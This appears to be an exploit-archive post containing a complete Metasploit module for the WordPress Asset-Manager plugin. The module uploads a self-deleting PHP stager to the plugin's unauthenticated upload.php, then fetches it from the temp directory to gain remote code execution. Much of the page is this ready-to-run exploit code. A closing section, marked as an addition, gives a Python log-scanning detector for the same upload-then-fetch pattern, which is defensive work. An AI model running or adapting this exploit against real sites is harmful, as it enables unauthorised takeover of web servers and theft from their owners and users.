WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP file uploads: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stager that writes and runs the selected payload, then deletes itself
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin reads the upload from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored file name back in the response body
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
```
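A defender-side check, added here and not part of the original post or of the Metasploit module: it scans constructed Apache-style access-log lines for the two-step pattern the module leaves behind (an unauthenticated POST to the plugin's upload.php answered with 200, then a GET of a .php file from wp-content/uploads/assets/temp/). The sample log lines, IP addresses and file names are constructed; because the module's stager is written with :unlink_self, the uploaded file is often already gone from disk, so the web log is frequently the only surviving evidence.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines in Apache combined format (not from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 23 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Dec/2012:09:20:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [31/Dec/2012:09:21:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.9 - - [31/Dec/2012:09:22:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 0 "-" "curl/7.26"
"""

# Minimal combined-log parser: client IP, method, request path and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# The unauthenticated upload endpoint the module abuses.
UPLOAD_RE = re.compile(r'/wp-content/plugins/asset-manager/upload\.php$')
# The temp directory the module fetches its file from to trigger execution.
TEMP_PHP_RE = re.compile(r'/wp-content/uploads/assets/temp/[^/]+\.php\d?$', re.I)


def detect(log_text):
    """Return (ip, path, severity) for every GET of a .php file from the
    asset-manager temp directory. Severity is 'high' when the same client
    earlier received a 200 from upload.php in this log, 'medium' otherwise."""
    uploaded = defaultdict(bool)  # ip -> saw a successful POST to upload.php
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, path, status = m.group('ip', 'method', 'path', 'status')
        if method == 'POST' and UPLOAD_RE.search(path):
            if status == '200':
                uploaded[ip] = True
        elif method == 'GET' and TEMP_PHP_RE.search(path):
            findings.append((ip, path, 'high' if uploaded[ip] else 'medium'))
    return findings


if __name__ == '__main__':
    for ip, path, sev in detect(SAMPLE_LOG):
        print(f'{sev}: {ip} fetched {path}')
```

A real deployment should also alert on any .php file appearing under the temp directory at all, since legitimate asset uploads are images and documents.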